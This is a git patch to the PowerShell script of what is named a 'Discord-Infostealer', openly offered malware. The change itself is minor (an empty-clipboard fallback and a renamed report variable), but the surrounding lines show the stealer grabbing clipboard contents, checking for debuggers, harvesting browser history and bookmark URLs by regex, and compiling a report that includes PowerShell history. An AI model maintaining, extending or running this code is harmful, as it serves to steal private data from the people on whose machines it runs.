From aee59486bd4f9a822728ea755c486b7c2958c29a Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Tue, 31 Dec 2024 23:08:12 +0000 Subject: [PATCH] Update main.ps1 --- Discord-Infostealer/main.ps1 | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/Discord-Infostealer/main.ps1 b/Discord-Infostealer/main.ps1 index 82e7aa6..2eab879 100644 --- a/Discord-Infostealer/main.ps1 +++ b/Discord-Infostealer/main.ps1 @@ -289,6 +289,9 @@ $debugDetect = "Debugging Check : $debugD" $clipboard = Get-Clipboard +if (!($clipboard)){ + $clipboard = "No Data Found.." +} # History and Bookmark Data $Expression = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' $Paths = @{ @@ -489,7 +492,7 @@ $clipboard Browser History --------------------------------------- -$Value +$entry Powershell History ---------------------------------------